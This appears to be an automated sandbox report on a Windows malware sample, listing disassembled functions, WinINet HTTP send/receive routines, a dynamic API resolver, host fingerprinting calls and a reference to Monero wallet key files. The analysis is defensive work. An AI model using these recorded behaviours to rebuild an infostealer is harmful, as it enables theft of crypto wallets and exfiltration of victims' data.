                      control_flow_graph 801 ee4880-ee4942 call efa7a0 call ee47b0 call efa740 * 5 InternetOpenA StrCmpCA 816 ee494b-ee494f 801->816 817 ee4944 801->817 818 ee4ecb-ee4ef3 InternetCloseHandle call efaad0 call ee9ac0 816->818 819 ee4955-ee4acd call ef8b60 call efa920 call efa8a0 call efa800 * 2 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa920 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa920 call efa8a0 call efa800 * 2 InternetConnectA 816->819 817->816 829 ee4ef5-ee4f2d call efa820 call efa9b0 call efa8a0 call efa800 818->829 830 ee4f32-ee4fa2 call ef8990 * 2 call efa7a0 call efa800 * 8 818->830 819->818 905 ee4ad3-ee4ad7 819->905 829->830 906 ee4ad9-ee4ae3 905->906 907 ee4ae5 905->907 908 ee4aef-ee4b22 HttpOpenRequestA 906->908 907->908 909 ee4ebe-ee4ec5 InternetCloseHandle 908->909 910 ee4b28-ee4e28 call efa9b0 call efa8a0 call efa800 call efa920 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa920 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa920 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa9b0 call efa8a0 call efa800 call efa920 call efa8a0 call efa800 call efa740 call efa920 * 2 call efa8a0 call efa800 * 2 call efaad0 lstrlen call efaad0 * 2 lstrlen call efaad0 HttpSendRequestA 908->910 909->818 1021 ee4e32-ee4e5c InternetReadFile 910->1021 1022 ee4e5e-ee4e65 1021->1022 1023 ee4e67-ee4eb9 InternetCloseHandle call efa800 1021->1023 1022->1023 1024 ee4e69-ee4ea7 call efa9b0 call efa8a0 call efa800 1022->1024 1023->909 1024->1021
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                        • Part of subcall function 00EE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4915
                      • StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE4ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F00DDB,00000000,?,?,00000000,?,",00000000,?,0168E320), ref: 00EE4DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EE4E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EE4E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EE4E49
                      • InternetCloseHandle.WININET(00000000), ref: 00EE4EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00EE4EC5
                      • HttpOpenRequestA.WININET(00000000,0168E4E0,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE4B15
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • InternetCloseHandle.WININET(00000000), ref: 00EE4ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 460715078-2180234286
                      • Opcode ID: 800242c81e01f15129b42513a6e832a5c238deca2cd9dccea8e48ee741bf9ca8
                      • Instruction ID: 731a8ef0c5b03ae4ce9d24ff8932ce2a6477f8f801f2d2bfd6bffc5a49b13654
                      • Opcode Fuzzy Hash: 800242c81e01f15129b42513a6e832a5c238deca2cd9dccea8e48ee741bf9ca8
                      • Instruction Fuzzy Hash: 08122EB291015CAADB18EB50DC56FEEB3B8AF54300F5451B9B20A76091DFB02F49CF62
                      Function 00EF78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF7917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00EF792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: de9d60ad400212bf433a4a5aef941caee135bde520a685b6c1846e6d86700155
                      • Instruction ID: 2303cff5b215914227245d27c7a79c92284b12d16c6302410897e755f7292a88
                      • Opcode Fuzzy Hash: de9d60ad400212bf433a4a5aef941caee135bde520a685b6c1846e6d86700155
                      • Instruction Fuzzy Hash: AA0186B1A08209EBC714DF94DD45BAABBB8FB44B11F104229FA55F3680C7B459408BA1
                      Function 00EF7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE11B7), ref: 00EF7880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF7887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: fa7fa664a0941482d58f51d0717a6072b9e25c7051c15c6e965b0358f91cb07e
                      • Instruction ID: 425ee2d25e866d22028e2bff4f3e4b14215f91134dffb09e9c6e58a4afd8754b
                      • Opcode Fuzzy Hash: fa7fa664a0941482d58f51d0717a6072b9e25c7051c15c6e965b0358f91cb07e
                      • Instruction Fuzzy Hash: 3AF04FB1944208ABC724DF98E949FAEBBB8EB04711F10066AFA15A3680C7B515448BA1
                      Function 00EE1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 43d652a6c954813eaeb7621c2ebf24c4658962bd721b7e92e04a003d7d814610
                      • Instruction ID: c0956849580106fcdb49ef927bdf82e8a0dec1bf1b14b06166c670c7672e1504
                      • Opcode Fuzzy Hash: 43d652a6c954813eaeb7621c2ebf24c4658962bd721b7e92e04a003d7d814610
                      • Instruction Fuzzy Hash: 60D05E7490030CEBCB28DFE0E8496EDBB78FB08311F0015A4D90673740EA3154D1CBA9
                      Function 00EF9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 633 ef9c10-ef9c1a 634 efa036-efa0ca LoadLibraryA * 8 633->634 635 ef9c20-efa031 GetProcAddress * 43 633->635 636 efa0cc-efa141 GetProcAddress * 5 634->636 637 efa146-efa14d 634->637 635->634 636->637 638 efa216-efa21d 637->638 639 efa153-efa211 GetProcAddress * 8 637->639 640 efa21f-efa293 GetProcAddress * 5 638->640 641 efa298-efa29f 638->641 639->638 640->641 642 efa337-efa33e 641->642 643 efa2a5-efa332 GetProcAddress * 6 641->643 644 efa41f-efa426 642->644 645 efa344-efa41a GetProcAddress * 9 642->645 643->642 646 efa428-efa49d GetProcAddress * 5 644->646 647 efa4a2-efa4a9 644->647 645->644 646->647 648 efa4dc-efa4e3 647->648 649 efa4ab-efa4d7 GetProcAddress * 2 647->649 650 efa515-efa51c 648->650 651 efa4e5-efa510 GetProcAddress * 2 648->651 649->648 652 efa612-efa619 650->652 653 efa522-efa60d GetProcAddress * 10 650->653 651->650 654 efa67d-efa684 652->654 655 efa61b-efa678 GetProcAddress * 4 652->655 653->652 656 efa69e-efa6a5 654->656 657 efa686-efa699 GetProcAddress 654->657 655->654 658 efa708-efa709 656->658 659 efa6a7-efa703 GetProcAddress * 4 656->659 657->656 659->658
                      APIs
                      • GetProcAddress.KERNEL32(76F70000,016768C0), ref: 00EF9C2D
                      • GetProcAddress.KERNEL32(76F70000,016766A0), ref: 00EF9C45
                      • GetProcAddress.KERNEL32(76F70000,01688F58), ref: 00EF9C5E
                      • GetProcAddress.KERNEL32(76F70000,01688EF8), ref: 00EF9C76
                      • GetProcAddress.KERNEL32(76F70000,0168C270), ref: 00EF9C8E
                      • GetProcAddress.KERNEL32(76F70000,0168C168), ref: 00EF9CA7
                      • GetProcAddress.KERNEL32(76F70000,0167B2D8), ref: 00EF9CBF
                      • GetProcAddress.KERNEL32(76F70000,0168C288), ref: 00EF9CD7
                      • GetProcAddress.KERNEL32(76F70000,0168C2A0), ref: 00EF9CF0
                      • GetProcAddress.KERNEL32(76F70000,0168C108), ref: 00EF9D08
                      • GetProcAddress.KERNEL32(76F70000,0168C1F8), ref: 00EF9D20
                      • GetProcAddress.KERNEL32(76F70000,01676600), ref: 00EF9D39
                      • GetProcAddress.KERNEL32(76F70000,016768E0), ref: 00EF9D51
                      • GetProcAddress.KERNEL32(76F70000,016766E0), ref: 00EF9D69
                      • GetProcAddress.KERNEL32(76F70000,01676700), ref: 00EF9D82
                      • GetProcAddress.KERNEL32(76F70000,0168C1E0), ref: 00EF9D9A
                      • GetProcAddress.KERNEL32(76F70000,0168C2B8), ref: 00EF9DB2
                      • GetProcAddress.KERNEL32(76F70000,0167B1C0), ref: 00EF9DCB
                      • GetProcAddress.KERNEL32(76F70000,01676900), ref: 00EF9DE3
                      • GetProcAddress.KERNEL32(76F70000,0168C2D0), ref: 00EF9DFB
                      • GetProcAddress.KERNEL32(76F70000,0168C0D8), ref: 00EF9E14
                      • GetProcAddress.KERNEL32(76F70000,0168C300), ref: 00EF9E2C
                      • GetProcAddress.KERNEL32(76F70000,0168C210), ref: 00EF9E44
                      • GetProcAddress.KERNEL32(76F70000,01676720), ref: 00EF9E5D
                      • GetProcAddress.KERNEL32(76F70000,0168C240), ref: 00EF9E75
                      • GetProcAddress.KERNEL32(76F70000,0168C120), ref: 00EF9E8D
                      • GetProcAddress.KERNEL32(76F70000,0168C2E8), ref: 00EF9EA6
                      • GetProcAddress.KERNEL32(76F70000,0168C180), ref: 00EF9EBE
                      • GetProcAddress.KERNEL32(76F70000,0168C318), ref: 00EF9ED6
                      • GetProcAddress.KERNEL32(76F70000,0168C030), ref: 00EF9EEF
                      • GetProcAddress.KERNEL32(76F70000,0168C198), ref: 00EF9F07
                      • GetProcAddress.KERNEL32(76F70000,0168C1B0), ref: 00EF9F1F
                      • GetProcAddress.KERNEL32(76F70000,0168C138), ref: 00EF9F38
                      • GetProcAddress.KERNEL32(76F70000,0168C8C8), ref: 00EF9F50
                      • GetProcAddress.KERNEL32(76F70000,0168C0A8), ref: 00EF9F68
                      • GetProcAddress.KERNEL32(76F70000,0168C258), ref: 00EF9F81
                      • GetProcAddress.KERNEL32(76F70000,01676740), ref: 00EF9F99
                      • GetProcAddress.KERNEL32(76F70000,0168C048), ref: 00EF9FB1
                      • GetProcAddress.KERNEL32(76F70000,01676920), ref: 00EF9FCA
                      • GetProcAddress.KERNEL32(76F70000,0168C060), ref: 00EF9FE2
                      • GetProcAddress.KERNEL32(76F70000,0168C228), ref: 00EF9FFA
                      • GetProcAddress.KERNEL32(76F70000,01676260), ref: 00EFA013
                      • GetProcAddress.KERNEL32(76F70000,01676220), ref: 00EFA02B
                      • LoadLibraryA.KERNEL32(0168C1C8,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA03D
                      • LoadLibraryA.KERNEL32(0168C078,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA04E
                      • LoadLibraryA.KERNEL32(0168C150,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA060
                      • LoadLibraryA.KERNEL32(0168C0C0,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA072
                      • LoadLibraryA.KERNEL32(0168C090,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA083
                      • LoadLibraryA.KERNEL32(0168C0F0,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA095
                      • LoadLibraryA.KERNEL32(0168C3D8,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA0A7
                      • LoadLibraryA.KERNEL32(0168C3F0,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA0B8
                      • GetProcAddress.KERNEL32(75840000,01676400), ref: 00EFA0DA
                      • GetProcAddress.KERNEL32(75840000,0168C468), ref: 00EFA0F2
                      • GetProcAddress.KERNEL32(75840000,01688B58), ref: 00EFA10A
                      • GetProcAddress.KERNEL32(75840000,0168C438), ref: 00EFA123
                      • GetProcAddress.KERNEL32(75840000,016761E0), ref: 00EFA13B
                      • GetProcAddress.KERNEL32(73AF0000,0167AE28), ref: 00EFA160
                      • GetProcAddress.KERNEL32(73AF0000,016763A0), ref: 00EFA179
                      • GetProcAddress.KERNEL32(73AF0000,0167ADD8), ref: 00EFA191
                      • GetProcAddress.KERNEL32(73AF0000,0168C528), ref: 00EFA1A9
                      • GetProcAddress.KERNEL32(73AF0000,0168C3A8), ref: 00EFA1C2
                      • GetProcAddress.KERNEL32(73AF0000,01676500), ref: 00EFA1DA
                      • GetProcAddress.KERNEL32(73AF0000,01676560), ref: 00EFA1F2
                      • GetProcAddress.KERNEL32(73AF0000,0168C348), ref: 00EFA20B
                      • GetProcAddress.KERNEL32(760B0000,01676440), ref: 00EFA22C
                      • GetProcAddress.KERNEL32(760B0000,016763E0), ref: 00EFA244
                      • GetProcAddress.KERNEL32(760B0000,0168C618), ref: 00EFA25D
                      • GetProcAddress.KERNEL32(760B0000,0168C420), ref: 00EFA275
                      • GetProcAddress.KERNEL32(760B0000,016762E0), ref: 00EFA28D
                      • GetProcAddress.KERNEL32(75D30000,0167B238), ref: 00EFA2B3
                      • GetProcAddress.KERNEL32(75D30000,0167B260), ref: 00EFA2CB
                      • GetProcAddress.KERNEL32(75D30000,0168C4E0), ref: 00EFA2E3
                      • GetProcAddress.KERNEL32(75D30000,01676520), ref: 00EFA2FC
                      • GetProcAddress.KERNEL32(75D30000,01676580), ref: 00EFA314
                      • GetProcAddress.KERNEL32(75D30000,0167AD88), ref: 00EFA32C
                      • GetProcAddress.KERNEL32(753A0000,0168C540), ref: 00EFA352
                      • GetProcAddress.KERNEL32(753A0000,016761C0), ref: 00EFA36A
                      • GetProcAddress.KERNEL32(753A0000,01688A78), ref: 00EFA382
                      • GetProcAddress.KERNEL32(753A0000,0168C588), ref: 00EFA39B
                      • GetProcAddress.KERNEL32(753A0000,0168C450), ref: 00EFA3B3
                      • GetProcAddress.KERNEL32(753A0000,01676540), ref: 00EFA3CB
                      • GetProcAddress.KERNEL32(753A0000,016762A0), ref: 00EFA3E4
                      • GetProcAddress.KERNEL32(753A0000,0168C3C0), ref: 00EFA3FC
                      • GetProcAddress.KERNEL32(753A0000,0168C4C8), ref: 00EFA414
                      • GetProcAddress.KERNEL32(76DA0000,01676420), ref: 00EFA436
                      • GetProcAddress.KERNEL32(76DA0000,0168C4F8), ref: 00EFA44E
                      • GetProcAddress.KERNEL32(76DA0000,0168C408), ref: 00EFA466
                      • GetProcAddress.KERNEL32(76DA0000,0168C480), ref: 00EFA47F
                      • GetProcAddress.KERNEL32(76DA0000,0168C330), ref: 00EFA497
                      • GetProcAddress.KERNEL32(77300000,016765A0), ref: 00EFA4B8
                      • GetProcAddress.KERNEL32(77300000,01676200), ref: 00EFA4D1
                      • GetProcAddress.KERNEL32(767E0000,01676240), ref: 00EFA4F2
                      • GetProcAddress.KERNEL32(767E0000,0168C498), ref: 00EFA50A
                      • GetProcAddress.KERNEL32(6F8E0000,01676380), ref: 00EFA530
                      • GetProcAddress.KERNEL32(6F8E0000,01676480), ref: 00EFA548
                      • GetProcAddress.KERNEL32(6F8E0000,01676280), ref: 00EFA560
                      • GetProcAddress.KERNEL32(6F8E0000,0168C4B0), ref: 00EFA579
                      • GetProcAddress.KERNEL32(6F8E0000,01676300), ref: 00EFA591
                      • GetProcAddress.KERNEL32(6F8E0000,016762C0), ref: 00EFA5A9
                      • GetProcAddress.KERNEL32(6F8E0000,016763C0), ref: 00EFA5C2
                      • GetProcAddress.KERNEL32(6F8E0000,01676340), ref: 00EFA5DA
                      • GetProcAddress.KERNEL32(6F8E0000,InternetSetOptionA), ref: 00EFA5F1
                      • GetProcAddress.KERNEL32(6F8E0000,HttpQueryInfoA), ref: 00EFA607
                      • GetProcAddress.KERNEL32(75760000,0168C510), ref: 00EFA629
                      • GetProcAddress.KERNEL32(75760000,01688AC8), ref: 00EFA641
                      • GetProcAddress.KERNEL32(75760000,0168C558), ref: 00EFA659
                      • GetProcAddress.KERNEL32(75760000,0168C600), ref: 00EFA672
                      • GetProcAddress.KERNEL32(762C0000,01676320), ref: 00EFA693
                      • GetProcAddress.KERNEL32(6D6E0000,0168C360), ref: 00EFA6B4
                      • GetProcAddress.KERNEL32(6D6E0000,01676360), ref: 00EFA6CD
                      • GetProcAddress.KERNEL32(6D6E0000,0168C570), ref: 00EFA6E5
                      • GetProcAddress.KERNEL32(6D6E0000,0168C5A0), ref: 00EFA6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: 683b6569f4470cc6ea7e16618a4b275833de179fe5cae4a50126a82a55376aa7
                      • Instruction ID: 3802de1037474f24b450e8e75397c8c6c43684e6c244f50b99628248c0876a39
                      • Opcode Fuzzy Hash: 683b6569f4470cc6ea7e16618a4b275833de179fe5cae4a50126a82a55376aa7
                      • Instruction Fuzzy Hash: 17621BB5500A40BFC37CDFA8F68895637F9FF4C601314853AE62AC3A4CD67A94E19B58
                      Function 00EE6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1033 ee6280-ee630b call efa7a0 call ee47b0 call efa740 InternetOpenA StrCmpCA 1040 ee630d 1033->1040 1041 ee6314-ee6318 1033->1041 1040->1041 1042 ee631e-ee6342 InternetConnectA 1041->1042 1043 ee6509-ee6525 call efa7a0 call efa800 * 2 1041->1043 1044 ee64ff-ee6503 InternetCloseHandle 1042->1044 1045 ee6348-ee634c 1042->1045 1063 ee6528-ee652d 1043->1063 1044->1043 1047 ee634e-ee6358 1045->1047 1048 ee635a 1045->1048 1050 ee6364-ee6392 HttpOpenRequestA 1047->1050 1048->1050 1052 ee6398-ee639c 1050->1052 1053 ee64f5-ee64f9 InternetCloseHandle 1050->1053 1055 ee639e-ee63bf InternetSetOptionA 1052->1055 1056 ee63c5-ee6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 ee642c-ee644b call ef8940 1056->1058 1059 ee6407-ee6427 call efa740 call efa800 * 2 1056->1059 1066 ee644d-ee6454 1058->1066 1067 ee64c9-ee64e9 call efa740 call efa800 * 2 1058->1067 1059->1063 1069 ee6456-ee6480 InternetReadFile 1066->1069 1070 ee64c7-ee64ef InternetCloseHandle 1066->1070 1067->1063 1074 ee648b 1069->1074 1075 ee6482-ee6489 1069->1075 1070->1053 1074->1070 1075->1074 1079 ee648d-ee64c5 call efa9b0 call efa8a0 call efa800 1075->1079 1079->1069
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                        • Part of subcall function 00EE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
